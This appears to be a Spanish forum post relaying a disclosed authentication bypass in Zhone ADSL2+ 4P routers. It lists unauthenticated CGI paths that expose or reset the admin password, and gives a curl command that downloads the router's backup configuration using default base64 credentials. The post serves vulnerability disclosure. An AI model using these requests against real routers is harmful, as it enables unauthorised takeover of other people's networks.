Obtención de privilegios roots en Zhone ADSL2+ 4P

kcdtv · 05-09-2015 11:10:11

Obtención de privilegios de administrador en la gama Zhone ADSL2+ 4P

No conocía a la marca Zhone.

Tienen una pequeña serie de CPE : products
Estos routers sufren de una grave enfermedad: además de tener una pinta que espanta hasta sus propias madres; son iguales de seguros que un router thomson ( cf Obtener los credenciales de administrador de un Thomson TWG850) big_smile
Es lo que demuestra hoy Mahmoud Khaled en vunerabiltylab.
La información fue también puesta en packet storm:

Zhone ADSL2+ 4P Authentiation Bypass / … Disclosure

¿Quieres ser root?

Puedes acceder a estas tres paginas mediante http sin conocer los credenciales

http://[LOCALHOST]:?/pvccfg.cgi
http://[LOCALHOST]:?/dnscfg.cgi
http://[LOCALHOST]:?/password.cgi  (In addition to text storage of sensitive information!)

En localhost pones la pasarela y si vas por ejemplo a password.cgi puedes conocer or re-configurar el nombre y la contraseña de administrador.
Puedes obtener los parámetros guardados en el fichero backupsettings.conf. gracias una simple petición con curl.
```
curl "http://<IP>/backupsettings.conf" -H "Authorization: Basic dXNlcjp1c2Vy" 
```
( ("dXNlcjp1c2Vy" = "user:user" en base64))

Un tipo de brecha ya vistas en le pasado y que no deberíamos encontrar en una serie moderna de puntos de acceso.

Tema	Respuestas	Vistas	Ultimo mensaje
Croc: Transferencia de ficheros fácil y segura en P2P con E2EE por kcdtv	2	118	16-05-2021 16:54:16 por kcdtv
¿Que hay de cierto en la evolución del Wifi 6 y toda la pesca? por SirLouen	7	126	12-05-2021 19:01:46 por kcdtv
Brechas de seguridad en Skyworth RN510, RN620 y RN410 por kcdtv	0	136	07-05-2021 14:27:40 por kcdtv
Pegado: Pegado:: HalfHandshaker - Obtener handshake de redes fuera de alcance! por Miguelillo0	9	572	03-05-2021 19:48:07 por Miguelillo0
Averigua si estás fichado por Google mediante FLoC por kcdtv	1	314	30-04-2021 14:22:21 por kcdtv

Foro Wifi-libre.com

Anuncio

#1 05-09-2015 11:10:11